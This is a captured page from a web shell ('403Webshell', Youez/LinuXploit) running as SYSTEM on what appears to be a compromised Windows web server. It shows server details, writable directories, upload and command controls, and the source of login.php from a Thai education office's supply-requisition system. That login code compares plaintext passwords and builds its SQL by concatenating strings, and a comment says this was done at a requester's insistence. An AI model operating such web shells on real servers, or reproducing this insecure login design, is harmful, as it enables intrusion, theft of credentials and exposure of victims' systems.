403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/supply_system/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www//supply_system/login.php
<?php
include_once 'config.php';
include_once 'functions.php';

// If already logged in, redirect to index
if (isLoggedIn()) {
    redirect('index.php');
}

$error_message = '';
$page_title = 'เข้าสู่ระบบ - ระบบเบิกพัสดุ สพม.ราชบุรี'; // กำหนด Title สำหรับ header

// Check if form is submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    if (empty($_POST['username']) || empty($_POST['password'])) {
        $error_message = 'กรุณากรอกชื่อผู้ใช้และรหัสผ่าน';
    } else {
        // --- !!! WARNING: Security Risk !!! ---
        // Storing and comparing plain text passwords is highly insecure.
        // It is strongly recommended to use password_hash() when storing
        // and password_verify() when checking passwords.
        // This code uses plain text comparison ONLY because you explicitly requested it.
        // Proceed with extreme caution and understand the risks involved.

        $username = sanitize_input($conn, $_POST['username']);
        $password = sanitize_input($conn, $_POST['password']); // Not hashed! Direct comparison.

        // Prepare SQL query
        $sql = "SELECT id, full_name, user_type, department_id, status
                FROM users
                WHERE username = '" . $username . "' AND password = '" . $password . "'"; // Direct password comparison

        $result = mysqli_query($conn, $sql);

        if ($result && mysqli_num_rows($result) == 1) {
            $user = mysqli_fetch_assoc($result);

            if ($user['status'] == 'active') {
                // Login successful, set session variables
                $_SESSION['user_id'] = $user['id'];
                $_SESSION['full_name'] = $user['full_name'];
                $_SESSION['user_type'] = $user['user_type']; // admin, supply_manager, department, head_of_department
                $_SESSION['department_id'] = $user['department_id']; // Can be NULL for admin/supply_manager

                // Redirect to the main page
                redirect('index.php');
            } else {
                $error_message = 'บัญชีผู้ใช้นี้ถูกระงับการใช้งาน';
            }
        } else {
            $error_message = 'ชื่อผู้ใช้หรือรหัสผ่านไม่ถูกต้อง';
        }
        mysqli_free_result($result);
    }
}
mysqli_close($conn);

// --- Include Header ---
// header.php จะรวม <head>, เปิด <body>, และเรียก CSS CDN
include_once 'includes/header.php';
?>

<style>
    /* Override sidebar styles for login page */
    body {
        display: flex;
        align-items: center;
        justify-content: center;
        min-height: 100vh;
        background-color: #f8f9fa;
        margin-left: 0 !important; /* Remove margin-left from sidebar */
         flex-direction: column !important; /* Ensure content is centered */

    }
     .content-wrapper {
        margin-left: 0 !important; /* Ensure content takes full width */
        width: 100%;
        display: flex;
        align-items: center;
        justify-content: center;
        padding: 20px; /* Add padding if needed */
        flex-grow: 1;
    }

    .login-card {
        max-width: 400px;
        width: 100%;
    }

     /* Hide sidebar elements on login page if they exist */
    .sidebar, #sidebarCollapse {
        display: none !important;
    }
</style>

<div class="card login-card shadow">
        <div class="card-body">
            <h3 class="card-title text-center mb-4">ระบบเบิกพัสดุ สพม.ราชบุรี</h3>
            <p class="text-center text-muted mb-4">กรุณาเข้าสู่ระบบ</p>

            <?php if (!empty($error_message)): ?>
                <div class="alert alert-danger" role="alert">
                    <?php echo $error_message; ?>
                </div>
            <?php endif; ?>

            <form method="POST" action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]);?>">
                <div class="mb-3">
                    <label for="username" class="form-label">ชื่อผู้ใช้:</label>
                    <input type="text" class="form-control" id="username" name="username" required autofocus>
                </div>
                <div class="mb-3">
                    <label for="password" class="form-label">รหัสผ่าน:</label>
                    <input type="password" class="form-control" id="password" name="password" required>
                </div>
                 <div class="d-grid">
                     <button type="submit" class="btn btn-primary">เข้าสู่ระบบ</button>
                 </div>
            </form>
             <hr>
        </div>
    </div>
<?php
// --- Include Footer ---
// footer.php จะเรียก JS CDN และปิด <body>, </html>
include_once 'includes/footer.php';
?>

Youez - 2016 - github.com/yon3zu
LinuXploit